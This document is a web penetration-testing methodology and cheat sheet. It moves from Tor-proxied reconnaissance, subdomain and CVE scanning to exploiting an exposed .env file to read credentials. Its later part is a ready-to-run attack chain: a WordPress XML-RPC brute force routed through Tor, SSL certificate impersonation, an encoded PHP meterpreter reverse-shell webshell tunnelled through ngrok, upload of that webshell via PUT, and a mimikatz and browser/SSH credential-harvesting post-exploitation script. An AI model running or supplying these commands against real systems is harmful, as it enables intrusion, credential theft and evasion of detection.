App Platform Configuration

Check List

• Ensure that defaults and known files have been removed.

• Validate that no debugging code or extensions are left in the production environments.

• Review the logging mechanisms set in place for the application.

Methodology

Black Box

TOR Technique for Finding Sensitive Routes

1

Using the following command that works with the _TOR tool, it creates 20 independent Tor proxies (SOCKS + control) for the debian-tor user and places them behind _Privoxy so programs can use them. And it makes it easier for an attacker to send requests to the server

2

Using the next command, we scan the web server to find out what features it has and get a list of the web server's features

3

Then, using the following commands, we get a list of target subdomains and then using the _{HTTPX tool} command, we check whether the subdomains we got are active

4

And we can use the next command to find out the open ports of all active subdomains

5

Using the Katana tool command, we crawl all pages and find the target points and files

6

Using the Katana tool command, we crawl all the pages and find the target points and files, and then we run it using the Grep command to find and show us if there is a sensitive file in our crawl output

7

And then using the Dirsearch tool command, which we run on all the subdomains that are hit, to find all the sensitive paths or even sensitive files that could expose information about users or the web server

8

Using the Nuclei command, we can find vulnerabilities and _CVEs on the target to identify the presence of vulnerabilities, and using the next commands, we can run commands related to the target's use of different _CMSs on the target

---

Information Disclosure via Exposed .env File

1

Navigate to the target web application and identify whether sensitive configuration files such as .env are publicly accessible, Send a request directly to the potential file location

GET /.env HTTP/1.1
Host: company.com

2

Observe the server response and check whether the file contents are returned in plaintext

MAIL_HOST=mail.company.com
MAIL_USERNAME=admin@company.com
MAIL_PASSWORD=AdminPass2024!
DATABASE_URL=postgresql://user:pass@host/db
AWS_ACCESS_KEY_ID=AKIA...
STRIPE_SECRET_KEY=sk_live_...

3

Verify the finding by accessing the file from a different session or device to confirm no authentication is required

4

Analyze the contents for sensitive credentials such as (SMTP credentials, Database connection strings)

5

Test potential impact by carefully verifying what access the disclosed credentials allow, such as (Logging into admin email accounts, Sending emails as the admin user, Accessing customer data or voucher codes)

6

Check for other common sensitive endpoints that may expose additional information

/.env
/.env.backup
/.git/config
/config.php
/.aws/credentials
/phpinfo.php

7

If sensitive information is accessible without authentication and can be used to compromise administrative functions, the Information Disclosure vulnerability is confirmed

---

Cheat Sheet

Sample And Known Files And Directories

Multitor

20 Tor Tunnel

multitor --init 20 \
         --user debian-tor \
         --socks-port 9000 \
         --control-port 9900 \
         --proxy privoxy

Nikto

Scan Web Server

nikto -h $WEBSITE

SubFinder

Subdomain Fuzzing

subfinder -d $WEBSITE -o /tmp/subdomains.txt

ShuffleDNS

Resolve Subdomains

echo "1.1.1.1" > /tmp/resolvers.txt
shuffledns -d $WEBSITE \
           -l /tmp/subdomains.txt \
           -r /tmp/resolvers.txt \
           -mode resolve \
           -o /tmp/alive-subdomains.txt

Httpx

Check Http Live

cat /tmp/sub-domains.txt | \
httpx -silent -sc -probe -title -td -ip \
      -mc 200,404,403,302,301,303,304,305,306,307,302 \
      -o /tmp/sub-domains.txt

Httpx-Toolkit

Find Alive Ports

httpx-toolkit -l /tmp/alive-subdomains.txt \
              -ports 80,443,8080,8000,8888,8082,8083 \
              -o /tmp/alive-sub-and-ports.txt

Katana

Find Source URLs

katana -u /tmp/alive-subdomains.txt \
       -d 5 -ps \
       -pss waybackarchive,commoncrawl,alienvault \
       -kf -jc -fx \
       -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg \
       -o /tmp/all-urls.txt

Grep

Find Sensitive Infos

cat /tmp/all-urls.txt | \
grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5'

Dirsearch

Directory Fuzzing

dirsearch -l /tmp/sub-domains.txt \
          -t 150 -x 403,404,500,429 -i 200,301,302 
          --random-agent 

Nuclei

List all Tags

nuclei -tgl

Scan OSINT & Recon

nuclei -u $WEBSITE -tags osint enum recon

Scan CVEs & Vulnerabilities

nuclei -u $WEBSITE -tags cves detect vulnerabilities

Scan CVEs with Multitor

nuclei -u $WEBSITE -tags cves detect vulnerabilities -proxy socks4://127.0.0.1:16379

Scan Misconf & Panel

nuclei -u $WEBSITE -tags exposure misconfig disclosure tech panel

XSS & SQLi & LFI & RCE & SSRF

nuclei -u $WEBSITE -tags xss lfi sqli ssrf traversal fileupload rce unauth deserialization

WPScan

Scan General

wpscan --url $WEBSITE --rua --api-token $TOKEN

Scan with Multitor

wpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379

Enum Users

wpscan --url $WEBSITE --rua --api-token $TOKEN -e u, m

Enum Plugins

wpscan --url $WEBSITE --rua --api-token $TOKEN -e ap, vp, p

Enum Themes

wpscan --url $WEBSITE --rua --api-token $TOKEN -e at, vt, t

Enum Config Backups

wpscan --url $WEBSITE --rua --api-token $TOKEN -e cb, dbe, tt

WPProbe

Enum Plugins

sudo wpprobe scan -u $WEBSITE --mode hybrid

Joomscan

Scan General

joomscan -u $WEBSITE --random-agent

Scan with Multitor

joomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379

Enum Endpoints

joomscan -u $WEBSITE --random-agent -ec

Droopescan

Scan General

droopescan scan drupal -u $WEBSITE

Enum Endpoints

droopescan scan drupal -u $WEBSITE --enumerate a

Drupwn

Scan General

drupwn --mode exploit --target $WEBSITE

Enum Endpoints

drupwn --mode enum --modules --target $WEBSITE

Enum Users

drupwn --mode enum --users --target $WEBSITE

SPartan

Scan SharePoint

spartan -u $WEBSITE --sps --users -s

IIS-ShortName-Scanner

Scan & Enum IIS

iis_shortname_scanner 2 20 $WEBSITE

Swagger Jacker

Scan API

sj brute -u $WEBSITE --randomize-user-agent

Scan Permission v1

sj automate -u $WEBSITE/swagger/v1/swagger.json --randomize-user-agent

Scan Permission v2

sj automate -u $WEBSITE/v2/swagger.json --randomize-user-agent

Comment Review

Katana

HTML Sources

katana -u $WEBSITE 

JS Sources

katana -u $WEBSITE | grep "\.js$"

CSS Sources

katana -u $WEBSITE | grep "\.css*"

System Configuration

Lynis (Linux)

lynis

Hardentools (Windows)

hardentools-cli.exe

Configuration Review

Nmap

HTTP Methods

nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

Metasploit

PingBack XMLRPC

msfconsole -qx "
    use auxiliary/scanner/http/wordpress_pingback_access;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    run;
    exit"

Brute force XMLRPC with Multitor

msfconsole -qx "
    use scanner/http/wordpress_xmlrpc_login;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    set USERNAME admin;
    set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;
    set THREADS 10;
    set STOP_ON_SUCCESS true;
    set Proxies socks4:127.0.0.1:16379;
    run;
    exit"

Scan PUT Methods

msfconsole -qx "
    use auxiliary/scanner/http/http_put;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    set PATH /wp-content/uploads;
    run -j"

Start Ngrok

ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

Generate Webshell

msfvenom -p php/meterpreter/reverse_tcp \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         HandlerSSLCert=$CERT \
         StagerVerifySSLCert=true \
         PayloadUUIDTracking=true \
         PayloadUUIDName=StagedPHP \
         EnableStageEncoding=true \
         -f raw \
         -e php/base64 \
         -i 3 \
         -o /tmp/unk9vvn.php; \
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php; \
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Listening Metasploit

msfconsole -qx "
    use multi/handler;
    set PAYLOAD php/meterpreter/reverse_tcp;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Upload Shell PUT Method

curl -v $WEBSITE/wp-content/uploads --upload-file /tmp/unk9vvn.php

Logging

Commix

Code Injection

commix -u $WEBSITE